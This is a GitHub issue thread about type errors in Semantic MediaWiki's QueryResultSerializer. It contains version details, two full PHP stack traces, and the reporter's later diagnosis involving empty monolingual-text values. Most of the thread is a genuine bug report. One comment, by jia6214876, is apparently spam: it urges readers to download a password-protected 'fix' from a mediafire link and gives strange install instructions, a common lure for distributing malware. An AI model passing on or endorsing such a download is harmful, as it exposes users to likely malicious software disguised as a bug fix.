### ISSUE TITLE
Type errors in QueryResultSerializer

### ISSUE THREAD

**Issue by simontaurus** [SemanticMediaWiki/SemanticMediaWiki#5713]
### Setup

- SMW version: 4.2.0 (also tested: 4.1.3)
- MW version: 1.39.3
- PHP version: 7.4.33 (also tested: 8.1)
- DB system (MySQL, Blazegraph, etc.) and version: MySQL 8.0.17, Blazegraph 2.1.5

### Issue
Recently got type errors while using the ask api. Seems like dataItems of type `SMWDIError` and `SMWDIBlob` occure in https://github.com/SemanticMediaWiki/SemanticMediaWiki/blob/d3ef92592b4366d7a4c8cfc1c858956f4f5bfc60/src/Serializers/QueryResultSerializer.php#L79 and are not proper handled.

 `SMWDIError`:
```
Exception caught: Call to undefined method SMWDIError::getSemanticData()
Error at /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(102)
```

`SMWDIBlob`: (observed in a compound query with a property chain terminated at a property with monolingual text
```
Exception caught: Argument 2 passed to SMW\DataValueFactory::newDataValueByItem() must be an instance of SMW\DIProperty or null, instance of SMWDIBlob given, called in /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php on line 88
```

Full stack traces
 `SMWDIError`:
```
Exception caught: Call to undefined method SMWDIError::getSemanticData()
Error at /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(102)
from /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(102)
#0 /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(217): SMW\\Serializers\\QueryResultSerializer::getSerialization()
#1 /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(59): SMW\\Serializers\\QueryResultSerializer::getSerializedQueryResult()
#2 /var/www/html/w/extensions/SemanticMediaWiki/src/Query/QueryResult.php(455): SMW\\Serializers\\QueryResultSerializer->serialize()
#3 /var/www/html/w/extensions/SemanticMediaWiki/src/Query/QueryResult.php(482): SMW\\Query\\QueryResult->serializeToArray()
#4 /var/www/html/w/extensions/SemanticResultFormats/formats/datatables/DataTables.php(555): SMW\\Query\\QueryResult->toArray()
#5 /var/www/html/w/extensions/SemanticResultFormats/formats/datatables/DataTables.php(440): SRF\\DataTables->getResultText()
#6 /var/www/html/w/extensions/SemanticMediaWiki/src/Query/ResultPrinters/ResultPrinter.php(304): SRF\\DataTables->buildResult()
#7 /var/www/html/w/extensions/SemanticMediaWiki/includes/query/SMW_QueryProcessor.php(348): SMW\\Query\\ResultPrinters\\ResultPrinter->getResult()
#8 /var/www/html/w/extensions/SemanticMediaWiki/src/ParserFunctions/AskParserFunction.php(370): SMWQueryProcessor::getResultFromQuery()
#9 /var/www/html/w/extensions/SemanticMediaWiki/src/ParserFunctions/AskParserFunction.php(202): SMW\\ParserFunctions\\AskParserFunction->doFetchResultsFromFunctionParameters()
#10 /var/www/html/w/extensions/SemanticMediaWiki/src/ParserFunctionFactory.php(402): SMW\\ParserFunctions\\AskParserFunction->parse()
#11 /var/www/html/w/includes/parser/Parser.php(3437): SMW\\ParserFunctionFactory->SMW\\{closure}()
#12 /var/www/html/w/includes/parser/Parser.php(3122): Parser->callParserFunction()
#13 /var/www/html/w/includes/parser/PPFrame_Hash.php(275): Parser->braceSubstitution()
#14 /var/www/html/w/includes/parser/Parser.php(2951): PPFrame_Hash->expand()
#15 /var/www/html/w/includes/parser/Parser.php(1609): Parser->replaceVariables()
#16 /var/www/html/w/includes/parser/Parser.php(723): Parser->internalParse()
#17 /var/www/html/w/includes/content/WikitextContentHandler.php(301): Parser->parse()
#18 /var/www/html/w/includes/content/ContentHandler.php(1721): WikitextContentHandler->fillParserOutput()
#19 /var/www/html/w/includes/content/Renderer/ContentRenderer.php(47): ContentHandler->getParserOutput()
#20 /var/www/html/w/includes/Revision/RenderedRevision.php(266): MediaWiki\\Content\\Renderer\\ContentRenderer->getParserOutput()
#21 /var/www/html/w/includes/Revision/RenderedRevision.php(237): MediaWiki\\Revision\\RenderedRevision->getSlotParserOutputUncached()
#22 /var/www/html/w/includes/Revision/RevisionRenderer.php(236): MediaWiki\\Revision\\RenderedRevision->getSlotParserOutput()
#23 /var/www/html/w/includes/Revision/RevisionRenderer.php(158): MediaWiki\\Revision\\RevisionRenderer->combineSlotOutput()
#24 [internal function]: MediaWiki\\Revision\\RevisionRenderer->MediaWiki\\Revision\\{closure}()
#25 /var/www/html/w/includes/Revision/RenderedRevision.php(199): call_user_func()
#26 /var/www/html/w/extensions/TemplateData/includes/Hooks.php(99): MediaWiki\\Revision\\RenderedRevision->getRevisionParserOutput()
#27 /var/www/html/w/includes/HookContainer/HookContainer.php(338): MediaWiki\\Extension\\TemplateData\\Hooks::onMultiContentSave()
#28 /var/www/html/w/includes/HookContainer/HookContainer.php(137): MediaWiki\\HookContainer\\HookContainer->callLegacyHook()
#29 /var/www/html/w/includes/HookContainer/HookRunner.php(2614): MediaWiki\\HookContainer\\HookContainer->run()
#30 /var/www/html/w/includes/Storage/PageUpdater.php(901): MediaWiki\\HookContainer\\HookRunner->onMultiContentSave()
#31 /var/www/html/w/includes/EditPage.php(2597): MediaWiki\\Storage\\PageUpdater->saveRevision()
#32 /var/www/html/w/includes/EditPage.php(1905): EditPage->internalAttemptSave()
#33 /var/www/html/w/includes/api/ApiEditPage.php(518): EditPage->attemptSave()
#34 /var/www/html/w/includes/api/ApiMain.php(1900): ApiEditPage->execute()
#35 /var/www/html/w/includes/api/ApiMain.php(844): ApiMain->executeAction()
#36 /var/www/html/w/extensions/VisualEditor/includes/ApiVisualEditorEdit.php(141): ApiMain->execute()
#37 /var/www/html/w/extensions/VisualEditor/includes/ApiVisualEditorEdit.php(459): MediaWiki\\Extension\\VisualEditor\\ApiVisualEditorEdit->saveWikitext()
#38 /var/www/html/w/includes/api/ApiMain.php(1900): MediaWiki\\Extension\\VisualEditor\\ApiVisualEditorEdit->execute()
#39 /var/www/html/w/includes/api/ApiMain.php(875): ApiMain->executeAction()
#40 /var/www/html/w/includes/api/ApiMain.php(846): ApiMain->executeActionWithErrorHandling()
#41 /var/www/html/w/api.php(90): ApiMain->execute()
#42 /var/www/html/w/api.php(45): wfApiMain()
#43 {main}"}
```

`SMWDIBlob`:
```
Exception caught: Argument 2 passed to SMW\DataValueFactory::newDataValueByItem() must be an instance of SMW\DIProperty or null, instance of SMWDIBlob given, called in /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php on line 88
TypeError at /var/www/html/w/extensions/SemanticMediaWiki/src/DataValueFactory.php(262)from /var/www/html/w/extensions/SemanticMediaWiki/src/DataValueFactory.php(262)
#0 /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(88): SMW\DataValueFactory->newDataValueByItem()
#1 /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(217): SMW\Serializers\QueryResultSerializer::getSerialization()
#2 /var/www/html/w/extensions/SemanticMediaWiki/src/Serializers/QueryResultSerializer.php(59): SMW\Serializers\QueryResultSerializer::getSerializedQueryResult()
#3 /var/www/html/w/extensions/SemanticMediaWiki/src/Query/QueryResult.php(455): SMW\Serializers\QueryResultSerializer->serialize()
#4 /var/www/html/w/extensions/SemanticMediaWiki/src/Query/QueryResult.php(482): SMW\Query\QueryResult->serializeToArray()
#5 /var/www/html/w/extensions/SemanticMediaWiki/src/MediaWiki/Api/ApiQueryResultFormatter.php(112): SMW\Query\QueryResult->toArray()
#6 /var/www/html/w/extensions/SemanticMediaWiki/src/MediaWiki/Api/Query.php(78): SMW\MediaWiki\Api\ApiQueryResultFormatter->doFormat()
#7 /var/www/html/w/extensions/SemanticCompoundQueries/src/Api/CompoundQuery.php(35): SMW\MediaWiki\Api\Query->addQueryResult()
#8 /var/www/html/w/includes/api/ApiMain.php(1900): SCQ\Api\CompoundQuery->execute()
#9 /var/www/html/w/includes/api/ApiMain.php(875): ApiMain->executeAction()
#10 /var/www/html/w/includes/api/ApiMain.php(846): ApiMain->executeActionWithErrorHandling()
#11 /var/www/html/w/api.php(90): ApiMain->execute()
#12 /var/www/html/w/api.php(45): wfApiMain()
#13 {main}
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gesinn-it-gea** [comment]
did you try with current master?

**Comment by simontaurus** [comment]
Yes, I also cloned the current master

**Comment by simontaurus** [comment]
after digging deeper, `SMWDIError` occurs when monolingual properties get asigned an empty value, e.g. `[[HasLabel::@en]]` and this property is part of the printout requests, e.g. `{{#ask: |?HasLabel }}`.
In addition, `DataItems` of type `_rec*` seem to be a general issue at the end of print request property chains (see also #5477)
